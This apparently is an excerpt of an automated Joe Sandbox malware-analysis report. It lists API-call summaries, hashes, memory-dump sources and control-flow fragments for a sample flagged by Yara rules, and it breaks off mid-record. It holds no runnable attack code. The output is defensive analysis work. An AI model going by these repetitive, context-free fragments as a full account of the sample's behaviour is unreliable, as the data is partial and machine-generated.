                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                                                                                                                                  • Instruction ID: 5a84dc2a4054867d55997e769e2a6f12d094b96c81da4381a78b552bdfc28452
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3041E421B0D6C291EA61AB5299403F9EBA0FF44F54F991434DE9C17785CF7CE491CBA0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 510365852-3916222277
                                                                                                                                                                                                                                                                                  • Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                                                                                                                                  • Instruction ID: 484edc208d74f2f7e31e9a85f61bb9ea5c97108473357ce7191be7956e3557c5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14117972A09B818AD760EF26B8401DAB361FB447B4F544339E6BD0BAD6CF78D0528B00
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                                                                                                                                  • Instruction ID: 4686da199e1de0bfe24c6aed951698a087b42841a675889db1effe9e1d687e60
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14612925B09AC286EA50AF16EC803F5E3A0EF59BA4FD40536D95C43766DF3CE0468F61
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                                                                                                                                  • Instruction ID: fb87535062d50ed4d9e6bea03c3ff770c8c576e9fb2aeaf3869b08acc9172a62
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451EA25B09AC682FA60AB11EC803F5F3A4FFA8794FD40536C99D43766DE7CE0548B61
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFailFastRaise
                                                                                                                                                                                                                                                                                  • String ID: Process is terminating due to StackOverflowException.
                                                                                                                                                                                                                                                                                  • API String ID: 2546344036-2200901744
                                                                                                                                                                                                                                                                                  • Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                                                                                                                                  • Instruction ID: 549b83c45e0c7e2e05fb398afbbe2eadaf8ca3c0d3fb83a95cc76deb70195513
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7517125B0A6C281FE54AB16EC503F8A391EF48B98FC45536DA1E477A0DF2EE4658B10
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                                                                                                                                  • Instruction ID: 427e01b7c9a6ed5e221826c2a37d6f75fd0172664f37757e8c54a24e27b61659
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5418232B097C685EF60AF66D8407B9B291EF41F94F94913ADE4E46789DE3CE4408F60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF339
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF356
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF376
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,00000000,?,00007FF72F5CB16E,?,?,-8000000000000000,00007FF72F5DE9AE,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5CF399
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                                                                                                                                  • Instruction ID: 948676e64f81ae9ebbf28868a25f254e4d72c2bc16ffe0f4fd0634534de302ee
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 513160227097C292EA64AF56A8402F9E6E4FF44F94F984035DA4E0BB95CF7CE451CB70
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB554
                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB55E
                                                                                                                                                                                                                                                                                  • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB57D
                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72F5A53F1), ref: 00007FF72F5AB591
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMultipleWait$HandlesObjects
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2817213684-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                                                                                                                                  • Instruction ID: b31ee0ba62afdf877b1a4b9af521297fa8426592eb90c235f67b30e0a535047c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB117031B0CA9592D7245B2AF80416AF2A5FB88B94F940139FE8E53B96DF3CD4108F50
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F60B963), ref: 00007FF72F60C6A8
                                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72F60B963), ref: 00007FF72F60C6E9
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF72F5AC313,?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AD08B
                                                                                                                                                                                                                                                                                  • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF72F5AC313,?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AD0C8
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: _stricmpstrtoull
                                                                                                                                                                                                                                                                                  • String ID: HeapVerify
                                                                                                                                                                                                                                                                                  • API String ID: 4031153986-2674988305
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D32ED
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D333E
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D3374
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D338F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C406A
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40AC
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40D7
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40F8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                                                                                                                                  • Instruction ID: 7d79e657b8cd9b9d33131c35b56bd1ce617fde6f01f7b7a6bb748929cc3c6372
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71216B25F4898282EA50AF15ED803F5A750EF287F8FD80236C52D466E5DF7CE194CB61

                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                  Execution Coverage:1.9%
                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                                                                                                                                                  Total number of Nodes:554
                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:69

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                                  • String ID: 1JA$rMA$rMA

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                                  • String ID: 1JA$rMA$rMA

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 208 41a3b2-41a3b6 209 41a3b8-41a3d6 208->209 210 41a39c-41a3b1 NtCreateFile 208->210 212 41a3dc-41a409 209->212 213 41a3d7 call 41af60 209->213 213->212
                                                                                                                                                                                                                                                                                  APIs
